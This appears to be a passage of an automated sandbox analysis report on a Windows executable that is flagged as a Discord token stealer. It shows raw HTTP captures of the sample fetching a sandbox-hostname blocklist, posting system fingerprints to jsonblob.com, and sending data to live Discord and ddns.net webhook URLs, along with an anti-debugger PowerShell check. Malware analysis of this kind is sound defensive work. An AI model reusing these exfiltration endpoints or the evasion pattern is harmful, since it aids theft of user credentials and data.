                                              X-Fastly-Request-ID: 2e23f4db6027cc0b5921c0528c0b3da714530a80
                                              Expires: Mon, 04 Nov 2024 15:29:47 GMT
                                              Source-Age: 0
                                              2024-11-04 15:24:47 UTC1378INData Raw: 30 30 39 30 30 42 43 38 33 38 30 32 0a 30 30 39 30 30 42 43 38 33 38 30 33 0a 30 43 43 34 37 41 43 38 33 38 30 33 0a 31 38 43 39 41 43 44 46 2d 37 43 30 30 2d 34 0a 33 43 45 43 45 46 43 38 33 38 30 36 0a 36 43 34 45 37 33 33 46 2d 43 32 44 39 2d 34 0a 41 42 49 47 41 49 0a 41 43 45 50 43 0a 41 49 44 41 4e 50 43 0a 41 4c 45 4e 4d 4f 4f 53 2d 50 43 0a 41 4c 49 4f 4e 45 0a 41 50 50 4f 4e 46 4c 59 2d 56 50 53 0a 41 52 43 48 49 42 41 4c 44 50 43 0a 61 7a 75 72 65 0a 42 33 30 46 30 32 34 32 2d 31 43 36 41 2d 34 0a 42 41 52 4f 53 49 4e 4f 2d 50 43 0a 42 45 43 4b 45 52 2d 50 43 0a 42 45 45 37 33 37 30 43 2d 38 43 30 43 2d 34 0a 43 38 31 46 36 36 43 38 33 38 30 35 0a 43 41 54 57 52 49 47 48 54 0a 43 48 53 48 41 57 0a 43 4f 46 46 45 45 2d 53 48 4f 50 0a 43 4f 4d 50
                                              Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
                                              2024-11-04 15:24:47 UTC1378INData Raw: 46 4f 0a 44 45 53 4b 54 4f 50 2d 4c 54 4d 43 4b 4c 41 0a 44 45 53 4b 54 4f 50 2d 4d 4a 43 36 35 30 30 0a 44 45 53 4b 54 4f 50 2d 4d 57 46 52 56 4b 48 0a 44 45 53 4b 54 4f 50 2d 4e 41 4b 46 46 4d 54 0a 44 45 53 4b 54 4f 50 2d 4e 4b 50 30 49 34 50 0a 44 45 53 4b 54 4f 50 2d 4e 4d 31 5a 50 4c 47 0a 44 45 53 4b 54 4f 50 2d 4e 54 55 37 56 55 4f 0a 44 45 53 4b 54 4f 50 2d 4f 36 46 42 4d 46 37 0a 44 45 53 4b 54 4f 50 2d 4f 37 42 49 33 50 54 0a 44 45 53 4b 54 4f 50 2d 50 41 30 46 4e 56 35 0a 44 45 53 4b 54 4f 50 2d 50 4b 51 4e 44 53 52 0a 44 45 53 4b 54 4f 50 2d 51 4c 4e 32 56 55 46 0a 44 45 53 4b 54 4f 50 2d 51 55 41 59 38 47 53 0a 44 45 53 4b 54 4f 50 2d 52 43 41 33 51 57 58 0a 44 45 53 4b 54 4f 50 2d 52 48 58 44 4b 57 57 0a 44 45 53 4b 54 4f 50 2d 52 50 34 46
                                              Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
                                              2024-11-04 15:24:47 UTC389INData Raw: 45 45 4c 35 33 53 4e 0a 57 49 4e 5a 44 53 2d 31 42 48 52 56 50 51 55 0a 57 49 4e 5a 44 53 2d 32 32 55 52 4a 49 42 56 0a 57 49 4e 5a 44 53 2d 33 46 46 32 49 39 53 4e 0a 57 49 4e 5a 44 53 2d 35 4a 37 35 44 54 48 48 0a 57 49 4e 5a 44 53 2d 36 54 55 49 48 4e 37 52 0a 57 49 4e 5a 44 53 2d 38 4d 41 45 49 38 45 34 0a 57 49 4e 5a 44 53 2d 39 49 4f 37 35 53 56 47 0a 57 49 4e 5a 44 53 2d 41 4d 37 36 48 50 4b 32 0a 57 49 4e 5a 44 53 2d 42 30 33 4c 39 43 45 4f 0a 57 49 4e 5a 44 53 2d 42 4d 53 4d 44 38 4d 45 0a 57 49 4e 5a 44 53 2d 42 55 41 4f 4b 47 47 31 0a 57 49 4e 5a 44 53 2d 4b 37 56 49 4b 34 46 43 0a 57 49 4e 5a 44 53 2d 4d 49 4c 4f 42 4d 33 35 0a 57 49 4e 5a 44 53 2d 50 55 30 55 52 50 56 49 0a 57 49 4e 5a 44 53 2d 51 4e 47 4b 47 4e 35 39 0a 57 49 4e 5a 44 53 2d
                                              Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.849708188.114.97.34435460C:\Users\user\Desktop\CFuejz2dRu.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-04 15:24:48 UTC186OUTPOST /api/jsonBlob HTTP/1.1
                                              Host: jsonblob.com
                                              User-Agent: Go-http-client/1.1
                                              Content-Length: 4135
                                              Accept: application/json
                                              Content-Type: application/json
                                              Accept-Encoding: gzip
                                              2024-11-04 15:24:48 UTC1000OUTData Raw: 7b 22 63 70 75 22 3a 5b 7b 22 63 70 75 22 3a 30 2c 22 76 65 6e 64 6f 72 49 64 22 3a 22 47 65 6e 75 69 6e 65 49 6e 74 65 6c 22 2c 22 66 61 6d 69 6c 79 22 3a 22 32 22 2c 22 6d 6f 64 65 6c 22 3a 22 22 2c 22 73 74 65 70 70 69 6e 67 22 3a 30 2c 22 70 68 79 73 69 63 61 6c 49 64 22 3a 22 43 45 39 38 41 36 39 30 35 31 22 2c 22 63 6f 72 65 49 64 22 3a 22 22 2c 22 63 6f 72 65 73 22 3a 31 2c 22 6d 6f 64 65 6c 4e 61 6d 65 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 6d 68 7a 22 3a 32 30 30 30 2c 22 63 61 63 68 65 53 69 7a 65 22 3a 30 2c 22 66 6c 61 67 73 22 3a 5b 5d 2c 22 6d 69 63 72 6f 63 6f 64 65 22 3a 22 22 7d 2c 7b 22 63 70 75 22 3a 31 2c 22 76 65 6e 64 6f 72 49 64 22 3a 22 47
                                              Data Ascii: {"cpu":[{"cpu":0,"vendorId":"GenuineIntel","family":"2","model":"","stepping":0,"physicalId":"CE98A69051","coreId":"","cores":1,"modelName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","mhz":2000,"cacheSize":0,"flags":[],"microcode":""},{"cpu":1,"vendorId":"G
                                              2024-11-04 15:24:48 UTC2372OUTData Raw: 6e 76 22 3a 7b 22 22 3a 22 3a 3a 3d 3a 3a 5c 5c 22 2c 22 41 4c 4c 55 53 45 52 53 50 52 4f 46 49 4c 45 22 3a 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 44 61 74 61 22 2c 22 41 50 50 44 41 54 41 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 68 75 62 65 72 74 5c 5c 41 70 70 44 61 74 61 5c 5c 52 6f 61 6d 69 6e 67 22 2c 22 43 4f 4d 50 55 54 45 52 4e 41 4d 45 22 3a 22 48 55 42 45 52 54 2d 50 43 22 2c 22 43 6f 6d 53 70 65 63 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 63 6d 64 2e 65 78 65 22 2c 22 43 6f 6d 6d 6f 6e 50 72 6f 67 72 61 6d 46 69 6c 65 73 22 3a 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 43 6f 6d 6d 6f 6e 20 46 69 6c 65 73 22 2c 22 43 6f 6d 6d 6f 6e 50 72 6f 67 72 61 6d 46 69 6c 65 73 28 78 38 36 29 22 3a 22 43
                                              Data Ascii: nv":{"":"::=::\\","ALLUSERSPROFILE":"C:\\ProgramData","APPDATA":"C:\\Users\\user\\AppData\\Roaming","COMPUTERNAME":"user-PC","ComSpec":"C:\\Windows\\system32\\cmd.exe","CommonProgramFiles":"C:\\Program Files\\Common Files","CommonProgramFiles(x86)":"C
                                              2024-11-04 15:24:48 UTC538OUTData Raw: 6c 61 69 6d 61 62 6c 65 22 3a 30 2c 22 73 75 6e 72 65 63 6c 61 69 6d 22 3a 30 2c 22 70 61 67 65 74 61 62 6c 65 73 22 3a 30 2c 22 73 77 61 70 63 61 63 68 65 64 22 3a 30 2c 22 63 6f 6d 6d 69 74 6c 69 6d 69 74 22 3a 30 2c 22 63 6f 6d 6d 69 74 74 65 64 61 73 22 3a 30 2c 22 68 69 67 68 74 6f 74 61 6c 22 3a 30 2c 22 68 69 67 68 66 72 65 65 22 3a 30 2c 22 6c 6f 77 74 6f 74 61 6c 22 3a 30 2c 22 6c 6f 77 66 72 65 65 22 3a 30 2c 22 73 77 61 70 74 6f 74 61 6c 22 3a 30 2c 22 73 77 61 70 66 72 65 65 22 3a 30 2c 22 6d 61 70 70 65 64 22 3a 30 2c 22 76 6d 61 6c 6c 6f 63 74 6f 74 61 6c 22 3a 30 2c 22 76 6d 61 6c 6c 6f 63 75 73 65 64 22 3a 30 2c 22 76 6d 61 6c 6c 6f 63 63 68 75 6e 6b 22 3a 30 2c 22 68 75 67 65 70 61 67 65 73 74 6f 74 61 6c 22 3a 30 2c 22 68 75 67 65 70 61
                                              Data Ascii: laimable":0,"sunreclaim":0,"pagetables":0,"swapcached":0,"commitlimit":0,"committedas":0,"hightotal":0,"highfree":0,"lowtotal":0,"lowfree":0,"swaptotal":0,"swapfree":0,"mapped":0,"vmalloctotal":0,"vmallocused":0,"vmallocchunk":0,"hugepagestotal":0,"hugepa
                                              2024-11-04 15:24:48 UTC225OUTData Raw: 74 65 72 66 61 63 65 20 31 22 2c 22 68 61 72 64 77 61 72 65 61 64 64 72 22 3a 22 22 2c 22 66 6c 61 67 73 22 3a 5b 22 75 70 22 2c 22 6c 6f 6f 70 62 61 63 6b 22 2c 22 6d 75 6c 74 69 63 61 73 74 22 5d 2c 22 61 64 64 72 73 22 3a 5b 7b 22 61 64 64 72 22 3a 22 3a 3a 31 2f 31 32 38 22 7d 2c 7b 22 61 64 64 72 22 3a 22 31 32 37 2e 30 2e 30 2e 31 2f 38 22 7d 5d 7d 5d 2c 22 70 75 62 6c 69 63 5f 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 75 69 64 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 77 69 6e 2e 61 74 74 61 63 68 65 64 5f 64 65 62 75 67 67 65 72 22 3a 66 61 6c 73 65 7d
                                              Data Ascii: terface 1","hardwareaddr":"","flags":["up","loopback","multicast"],"addrs":[{"addr":"::1/128"},{"addr":"127.0.0.1/8"}]}],"public_ip":"173.254.250.69","uid":"9e146be9-c76a-4720-bcdb-53011b87bd06","win.attached_debugger":false}
                                              2024-11-04 15:24:48 UTC178INHTTP/1.1 403 Forbidden
                                              Server: cloudflare
                                              Date: Mon, 04 Nov 2024 15:24:48 GMT
                                              Content-Type: text/html
                                              Content-Length: 151
                                              Connection: close
                                              CF-RAY: 8dd59cf1cf69e82f-DFW
                                              2024-11-04 15:24:48 UTC151INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.849709188.114.97.34435460C:\Users\user\Desktop\CFuejz2dRu.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-04 15:24:49 UTC184OUTPOST /api/jsonBlob HTTP/1.1
                                              Host: jsonblob.com
                                              User-Agent: Go-http-client/1.1
                                              Content-Length: 28
                                              Accept: application/json
                                              Content-Type: application/json
                                              Accept-Encoding: gzip
                                              2024-11-04 15:24:49 UTC28OUTData Raw: 7b 22 45 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 54 6f 6b 65 6e 73 22 3a 6e 75 6c 6c 7d
                                              Data Ascii: {"Error":null,"Tokens":null}
                                              2024-11-04 15:24:49 UTC178INHTTP/1.1 403 Forbidden
                                              Server: cloudflare
                                              Date: Mon, 04 Nov 2024 15:24:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 151
                                              Connection: close
                                              CF-RAY: 8dd59cf82b112c9c-DFW
                                              2024-11-04 15:24:49 UTC151INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.849710162.159.137.2324435460C:\Users\user\Desktop\CFuejz2dRu.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-04 15:24:50 UTC247OUTPOST /api/webhooks/1300019313184608266/FeQlgT1nouUBj-HNeYycjpr9Nw2LI_OPHxx-u8ZXx5mMbMn1xnI5pbwKHfVTgTRkzJCv HTTP/1.1
                                              Host: discord.com
                                              User-Agent: Go-http-client/1.1
                                              Content-Length: 321
                                              Content-Type: application/json
                                              Accept-Encoding: gzip
                                              2024-11-04 15:24:50 UTC321OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 20 7c 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 56 6d 20 73 74 61 74 75 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 49 73 20 69 6e 20 76 6d 3a 20 4e 6f 22 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 54 72 69 67 67 65 72 22 2c 22 76 61 6c 75 65 22 3a 22 5c 22 5c 22 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 41 64 64 69 74 69 6f 6e 61 6c 73 20 49 6e 66 6f 73 22 2c 22 76 61 6c 75 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 73 6f 6e 62 6c 6f 62 2e 63 6f 6d 2f 22 7d 5d 7d 2c 7b 22 74 69 74 6c 65 22 3a 22 44 69 73 63 6f 72 64 20 49 6e
                                              Data Ascii: {"username":"9e146be9-c76a-4720-bcdb-53011b87bd06 | 173.254.250.69","embeds":[{"title":"Vm status","description":"Is in vm: No","fields":[{"name":"Trigger","value":"\"\""},{"name":"Additionals Infos","value":"https://jsonblob.com/"}]},{"title":"Discord In
                                              2024-11-04 15:24:50 UTC1360INHTTP/1.1 204 No Content
                                              Date: Mon, 04 Nov 2024 15:24:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Set-Cookie: __dcfduid=eeedcc6e9ac011efbab27a7dbe66a149; Expires=Sat, 03-Nov-2029 15:24:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                              x-ratelimit-limit: 5
                                              x-ratelimit-remaining: 4
                                              x-ratelimit-reset: 1730733891
                                              x-ratelimit-reset-after: 1
                                              via: 1.1 google
                                              alt-svc: h3=":443"; ma=86400
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pTJa7UAOr2I0%2B0Sx7fRgKsc3EZc8Xeyq%2Fnb9Uc%2BOcGX%2FAYeC7tM5V3bQtjL7Y1dUkyLtMlaZwQpmhIz%2F5J1GyUjZxtjqoTtkLCzM89nMIHSeDs%2FPSULBzyw8FMUB"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              X-Content-Type-Options: nosniff
                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                              Set-Cookie: __sdcfduid=eeedcc6e9ac011efbab27a7dbe66a1492788cb31a1b3e6c8288a355d4870adadabf6f035b7fae7573c4a0210972302e6; Expires=Sat, 03-Nov-2029 15:24:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                              Set-Cookie: __cfruid=1860d9b6c0b4e0f545fc341099a3e72583778ef9-1730733890; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                              2024-11-04 15:24:50 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 77 76 39 4c 4f 63 37 6c 4d 4b 6d 5f 71 55 62 38 45 34 30 61 62 6e 58 41 51 36 6d 70 59 59 4a 55 31 6d 30 31 58 57 79 36 37 4f 34 2d 31 37 33 30 37 33 33 38 39 30 34 39 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 64 35 39 63 66 65 33 62 31 31 36 63 30 34 2d 44 46 57 0d 0a 0d 0a
                                              Data Ascii: Set-Cookie: _cfuvid=wv9LOc7lMKm_qUb8E40abnXAQ6mpYYJU1m01XWy67O4-1730733890493-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8dd59cfe3b116c04-DFW


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.86204386.237.153.1214435460C:\Users\user\Desktop\CFuejz2dRu.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-04 15:24:52 UTC248OUTPOST /webhook/1218887559619412029/Eva2oRkKwFen8y0e2duZ2zkjwo66NO-HdAdY99U_FseLCs0vvbTTUpzvmBAHiUakxGb3 HTTP/1.1
                                              Host: goatherd.ddns.net
                                              User-Agent: Go-http-client/1.1
                                              Content-Length: 321
                                              Content-Type: application/json
                                              Accept-Encoding: gzip
                                              2024-11-04 15:24:52 UTC321OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 20 7c 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 56 6d 20 73 74 61 74 75 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 49 73 20 69 6e 20 76 6d 3a 20 4e 6f 22 2c 22 66 69 65 6c 64 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 54 72 69 67 67 65 72 22 2c 22 76 61 6c 75 65 22 3a 22 5c 22 5c 22 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 41 64 64 69 74 69 6f 6e 61 6c 73 20 49 6e 66 6f 73 22 2c 22 76 61 6c 75 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 73 6f 6e 62 6c 6f 62 2e 63 6f 6d 2f 22 7d 5d 7d 2c 7b 22 74 69 74 6c 65 22 3a 22 44 69 73 63 6f 72 64 20 49 6e
                                              Data Ascii: {"username":"9e146be9-c76a-4720-bcdb-53011b87bd06 | 173.254.250.69","embeds":[{"title":"Vm status","description":"Is in vm: No","fields":[{"name":"Trigger","value":"\"\""},{"name":"Additionals Infos","value":"https://jsonblob.com/"}]},{"title":"Discord In
                                              2024-11-04 15:24:52 UTC1562INHTTP/1.1 204 No Content
                                              Server: nginx
                                              Date: Mon, 04 Nov 2024 13:46:03 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Set-Cookie: __dcfduid=f044a15a9ac011ef93c4d6d1ab5c9d43; Expires=Sat, 03-Nov-2029 15:24:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                              x-ratelimit-limit: 5
                                              x-ratelimit-remaining: 4
                                              x-ratelimit-reset: 1730733894
                                              x-ratelimit-reset-after: 1
                                              via: 1.1 google
                                              alt-svc: h3=":443"; ma=86400
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSszPAGeSgSz5gBRV%2BSL8JYKgSN3qx%2FXsF72VyF9jmtsrm2RtSn87Vc3Vc%2BUYtGGOPmQZoUngmR844JIz9RzCkNDQWGwOYtZvNu0NQooMcl%2BFmr9NQdzvcmIVhIm"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              X-Content-Type-Options: nosniff
                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                              Set-Cookie: __sdcfduid=f044a15a9ac011ef93c4d6d1ab5c9d43eff1943b6de2a13aabe86cc79d2b254ec652758d80c24cbb0eb3f034883a4bb0; Expires=Sat, 03-Nov-2029 15:24:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                              Set-Cookie: __cfruid=d7be4b994b29ddca6dcf910373192862666e291f-1730733892; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                              Set-Cookie: _cfuvid=i.xw5DAmSTzWBXGgNeTc5Kdm3Ubwc8yumeiIF3Uk7X0-1730733892773-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                              CF-RAY: 8dd59d0c4955d161-CDG


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:10:24:40
                                              Start date:04/11/2024
                                              Path:C:\Users\user\Desktop\CFuejz2dRu.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\CFuejz2dRu.exe"
                                              Imagebase:0xbc0000
                                              File size:6'226'432 bytes
                                              MD5 hash:020B08DA71B11949586B7A6185877B13
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000000.00000002.1591335139.000000C000016000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:10:24:40
                                              Start date:04/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:10:24:42
                                              Start date:04/11/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -command [Diagnostics.Debugger]::IsAttached
                                              Imagebase:0x7ff6cb6b0000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1590358089.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                • Associated: 00000000.00000002.1590339414.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590565021.0000000000E82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590771855.0000000001147000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590790518.0000000001149000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590806306.000000000114A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590821655.000000000114D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590837964.000000000114E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590854252.000000000114F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590879799.0000000001179000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590896469.000000000117A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590911640.000000000117C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590928918.000000000118A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590947174.000000000118E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590963228.000000000118F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590979501.0000000001191000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590979501.00000000011AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590979501.00000000011B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590979501.00000000011DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1591053345.00000000011E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1591073711.00000000011F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1591088802.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_bc0000_CFuejz2dRu.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                                                • Instruction ID: d354358b46491c190e786361f24cd537a364e799d4ca3894af0b6ddce542556d
                                                • Opcode Fuzzy Hash: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                                                • Instruction Fuzzy Hash: BD31782791CFC482D3218B24F5417AAB364F7A9794F15A715EFC812A1ADF38E2E5CB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1590358089.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                • Associated: 00000000.00000002.1590339414.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590565021.0000000000E82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590771855.0000000001147000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590790518.0000000001149000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1590806306.000000000114A000.00000004.00000001.01000000.00000003.sdmpDownload File
